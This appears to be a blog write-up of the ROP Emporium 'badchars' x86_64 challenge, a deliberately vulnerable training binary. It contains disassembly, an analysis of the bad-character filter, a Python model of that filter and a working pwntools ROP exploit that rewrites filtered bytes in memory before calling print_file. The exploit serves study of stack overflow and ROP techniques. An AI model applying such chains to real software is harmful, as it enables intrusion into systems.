badchar

2023. 7. 7. 17:04·Wargame/ROP Emporium

1. intro

2. Code and analysis

2.1. code

usefulGadget

   0x0000000000400628 <+0>:     xor    %r14b,(%r15)
   0x000000000040062b <+3>:     ret
   0x000000000040062c <+4>:     add    %r14b,(%r15)
   0x000000000040062f <+7>:     ret
   0x0000000000400630 <+8>:     sub    %r14b,(%r15)
   0x0000000000400633 <+11>:    ret
   0x0000000000400634 <+12>:    mov    %r12,0x0(%r13)
   0x0000000000400638 <+16>:    ret
   0x0000000000400639 <+17>:    nopl   0x0(%rax)

pwnme

   0x00000000000008fa <+0>:     push   %rbp
   0x00000000000008fb <+1>:     mov    %rsp,%rbp
   0x00000000000008fe <+4>:     sub    $0x40,%rsp
   0x0000000000000902 <+8>:     mov    0x2006cf(%rip),%rax        # 0x200fd8
   0x0000000000000909 <+15>:    mov    (%rax),%rax
   0x000000000000090c <+18>:    mov    $0x0,%ecx
   0x0000000000000911 <+23>:    mov    $0x2,%edx
   0x0000000000000916 <+28>:    mov    $0x0,%esi
   0x000000000000091b <+33>:    mov    %rax,%rdi
   0x000000000000091e <+36>:    call   0x7e0 <setvbuf@plt>
   0x0000000000000923 <+41>:    lea    0x17a(%rip),%rdi        # 0xaa4
   0x000000000000092a <+48>:    call   0x780 <puts@plt>
   0x000000000000092f <+53>:    lea    0x187(%rip),%rdi        # 0xabd
   0x0000000000000936 <+60>:    call   0x780 <puts@plt>
   0x000000000000093b <+65>:    lea    -0x40(%rbp),%rax
   0x000000000000093f <+69>:    add    $0x20,%rax
   0x0000000000000943 <+73>:    mov    $0x20,%edx
   0x0000000000000948 <+78>:    mov    $0x0,%esi
   0x000000000000094d <+83>:    mov    %rax,%rdi
   0x0000000000000950 <+86>:    call   0x7b0 <memset@plt>
   0x0000000000000955 <+91>:    lea    0x16c(%rip),%rdi        # 0xac8
   0x000000000000095c <+98>:    call   0x780 <puts@plt>
   0x0000000000000961 <+103>:   lea    0x181(%rip),%rdi        # 0xae9
   0x0000000000000968 <+110>:   mov    $0x0,%eax
   0x000000000000096d <+115>:   call   0x7a0 <printf@plt>
   0x0000000000000972 <+120>:   lea    -0x40(%rbp),%rax
   0x0000000000000976 <+124>:   add    $0x20,%rax
   0x000000000000097a <+128>:   mov    $0x200,%edx
   0x000000000000097f <+133>:   mov    %rax,%rsi
   0x0000000000000982 <+136>:   mov    $0x0,%edi
   0x0000000000000987 <+141>:   call   0x7c0 <read@plt>
   0x000000000000098c <+146>:   mov    %rax,-0x40(%rbp)
   0x0000000000000990 <+150>:   movq   $0x0,-0x38(%rbp)
   0x0000000000000998 <+158>:   jmp    0x9eb <pwnme+241>
   0x000000000000099a <+160>:   movq   $0x0,-0x30(%rbp)
   0x00000000000009a2 <+168>:   jmp    0x9d5 <pwnme+219>
   0x00000000000009a4 <+170>:   mov    -0x38(%rbp),%rax
   0x00000000000009a8 <+174>:   movzbl -0x20(%rbp,%rax,1),%ecx
   0x00000000000009ad <+179>:   mov    -0x30(%rbp),%rax
   0x00000000000009b1 <+183>:   mov    0x200628(%rip),%rdx        # 0x200fe0
   0x00000000000009b8 <+190>:   movzbl (%rdx,%rax,1),%eax
   0x00000000000009bc <+194>:   cmp    %al,%cl
   0x00000000000009be <+196>:   jne    0x9c9 <pwnme+207>
   0x00000000000009c0 <+198>:   mov    -0x38(%rbp),%rax
   0x00000000000009c4 <+202>:   movb   $0xeb,-0x20(%rbp,%rax,1)
   0x00000000000009c9 <+207>:   mov    -0x30(%rbp),%rax
   0x00000000000009cd <+211>:   add    $0x1,%rax
   0x00000000000009d1 <+215>:   mov    %rax,-0x30(%rbp)
   0x00000000000009d5 <+219>:   mov    -0x30(%rbp),%rax
   0x00000000000009d9 <+223>:   cmp    $0x3,%rax
   0x00000000000009dd <+227>:   jbe    0x9a4 <pwnme+170>
   0x00000000000009df <+229>:   mov    -0x38(%rbp),%rax
   0x00000000000009e3 <+233>:   add    $0x1,%rax
   0x00000000000009e7 <+237>:   mov    %rax,-0x38(%rbp)
   0x00000000000009eb <+241>:   mov    -0x38(%rbp),%rdx
   0x00000000000009ef <+245>:   mov    -0x40(%rbp),%rax
   0x00000000000009f3 <+249>:   cmp    %rax,%rdx
   0x00000000000009f6 <+252>:   jb     0x99a <pwnme+160>
   0x00000000000009f8 <+254>:   lea    0xed(%rip),%rdi        # 0xaec
   0x00000000000009ff <+261>:   call   0x780 <puts@plt>
   0x0000000000000a04 <+266>:   nop
   0x0000000000000a05 <+267>:   leave
   0x0000000000000a06 <+268>:   ret

 

2.2. Analysis

The rest is the same as the previous challenge.

However, as you can see when running the binary, some characters are filtered. In the disassembly above, the loop at pwnme+160 through +252 walks over every byte that read() returned, compares it with each of the four bad characters (the inner loop runs while the index is <= 3), and overwrites any match with 0xeb. The filter runs over the entire input, so gadget addresses and data alike must avoid these bytes.

┌[wyv3rn🐲]-(~/rop)
└> ./badchars
badchars by ROP Emporium
x86_64

badchars are: 'x', 'g', 'a', '.'
>

 

3. Vulnerability and exploit preparation

3.1. Vulnerability

buffer overflow

3.2. Exploit preparation

Certain characters are filtered, but as usefulGadget shows, the byte at a chosen address can be incremented or decremented (add/sub %r14b,(%r15)), so the string is written with the filtered bytes altered and then repaired in memory to complete it.
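To make the filter concrete, the following Python model replays the loop in pwnme as derived from the disassembly in 2.1 and checks which bytes of a candidate string survive and which offsets the add gadget must repair. This is an added example, not code from the original post; the badchar table, the 0xeb replacement value and the two sample strings are taken from the page.

```python
# Model of the filter loop in pwnme (derived from the disassembly above).
# Added example, not code from the original post.
BADCHARS = b"xga."      # from the banner: badchars are 'x', 'g', 'a', '.'
REPLACEMENT = 0xEB      # movb $0xeb,-0x20(%rbp,%rax,1)


def pwnme_filter(data: bytes) -> bytes:
    """Replay the two nested loops at pwnme+160..+252.

    Outer loop: i over every byte read() returned (-0x38(%rbp) vs -0x40(%rbp)).
    Inner loop: j in 0..3 over the badchar table (-0x30(%rbp), cmp $0x3 / jbe).
    A byte equal to any badchar is overwritten in place with 0xeb.
    """
    out = bytearray(data)
    for i in range(len(out)):
        for j in range(4):
            if out[i] == BADCHARS[j]:
                out[i] = REPLACEMENT
    return bytes(out)


def survives(data: bytes) -> bool:
    """True if the filter leaves every byte untouched (check the whole
    payload, not just the string: addresses pass through the same loop)."""
    return pwnme_filter(data) == data


def fixups(wanted: bytes, staged: bytes):
    """Offsets where the staged bytes differ from the wanted string and the
    8-bit delta that add %r14b,(%r15) must apply at each of them."""
    if len(wanted) != len(staged):
        raise ValueError("strings must have equal length")
    return [(i, (w - s) & 0xFF)
            for i, (w, s) in enumerate(zip(wanted, staged)) if w != s]


# Constructed sample: the file name the chain writes, raw and as staged.
WANTED = b"flag.txt"
STAGED = b"fl\x60f\x2dt\x77t"   # each badchar decremented by one

if __name__ == "__main__":
    print(pwnme_filter(WANTED))   # raw string is mangled by the filter
    print(survives(STAGED))       # staged string passes unchanged
    print(fixups(WANTED, STAGED)) # offsets 2, 3, 4, 6 each need +1
```

The fixup list matches the bss+2, bss+3, bss+4 and bss+6 targets with r14 = 1 in the chain below.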

 

4. exploit

from pwn import *

p = process('./badchars')

# gadget and data addresses (as in the original post)
p_12131415 = 0x40069c   # pop r12; pop r13; pop r14; pop r15; ret
p_1415 = 0x4006a0       # pop r14; pop r15; ret
xor = 0x400628          # xor %r14b,(%r15); ret   (not used here)
add = 0x40062c          # add %r14b,(%r15); ret
sub = 0x400630          # sub %r14b,(%r15); ret   (not used here)
mov = 0x400634          # mov %r12,0x0(%r13); ret
bss = 0x601100          # writable scratch area for the file name

pay = b'A'*0x28                 # 0x20-byte buffer + saved rbp
pay += p64(p_12131415)
pay += b'fl\x60f\x2dt\x77t'     # r12: "flag.txt" with each badchar decremented by 1
pay += p64(bss)                 # r13: where to write it
pay += p64(1)                   # r14: value added back by the add gadget
pay += p64(bss + 2)             # r15: byte 2 ('`' -> 'a')
pay += p64(mov)                 # [bss] = "fl`f-twt"
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 3)             # byte 3 ('f' -> 'g')
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 4)             # byte 4 ('-' -> '.')
pay += p64(add)
pay += p64(p_1415)
pay += p64(1)
pay += p64(bss + 6)             # byte 6 ('w' -> 'x')
pay += p64(add)
pay += p64(0x4006a3)            # pop rdi; ret
pay += p64(bss)                 # rdi = "flag.txt"
pay += p64(0x400620)            # call print_file@plt inside usefulFunction

p.sendafter(b'> ', pay)

p.interactive()